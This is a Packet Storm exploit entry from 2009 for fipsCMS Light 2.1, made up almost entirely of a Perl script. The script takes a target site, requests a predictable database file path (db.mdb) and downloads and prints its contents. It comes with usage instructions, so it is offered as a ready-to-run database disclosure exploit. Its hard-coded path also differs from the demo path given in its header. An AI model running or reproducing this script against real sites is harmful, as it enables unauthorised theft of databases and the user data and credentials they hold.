fipsCMS Light 2.1 Database Disclosure

2009-07-01T00:00:00
ID PACKETSTORM:78823
Type packetstorm
Reporter d3b4g
Modified 2009-07-01T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit  
#  
# Exploit by d3b4g  
# script:http://fipsasp.com  
# Demo: http://demo.fipsasp.com/fipsCMS_light/_fipsdb/db.mdb  
# From Tiny little island of maldivies  
#  
#  
#  
#  
#  
use LWP::Simple;  
use LWP::UserAgent;  
  
print "\fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit\n";  
  
print "\t****************************************************************\n";  
print "\t* fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit *\n";  
print "\t* by d3b4g *\n";  
print "\t****************************************************************\n\n\n\n";  
if(@ARGV < 1)  
{  
&help; exit();  
}  
sub help()  
{  
print "[X] Usage : perl $0 site \n";  
print "[X] Exemple : perl $0 www.vuln.com \n";  
}  
($site) = @ARGV;  
print("Please Wait ! Connecting to Server ......\n\n");  
sleep(5);  
$database = "mdb-database/fipsdb/db.mdb";  
my $exploit = "http://" . $site . "/" . $database;  
print("Searching For file ...\n\n");  
sleep(3);  
$sploit=get $exploit;  
if($sploit){  
print("..........................downloading db...........................\n");  
print("$sploit\n");  
}  
else {  
help();  
exit;  
}`